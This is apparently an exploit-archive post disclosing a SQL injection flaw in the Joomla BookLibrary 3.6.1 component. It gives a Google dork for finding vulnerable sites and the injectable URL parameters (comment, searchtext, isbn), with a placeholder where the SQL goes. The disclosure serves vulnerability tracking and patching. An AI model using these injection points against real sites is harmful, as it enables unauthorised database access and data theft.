Home / os / winmobile

Joomla BookLibrary 3.6.1 SQL Injection

Posted on 23 February 2017

# # # # # # Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection # Google Dork: inurl:index.php?option=com_booklibrary # Date: 22.02.2017 # Vendor Homepage: http://ordasoft.com/ # Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/ # Demo: http://ordasvit.com/joomla-book-library # Version: 3.6.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL] # http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207 # # # # #

 

TOP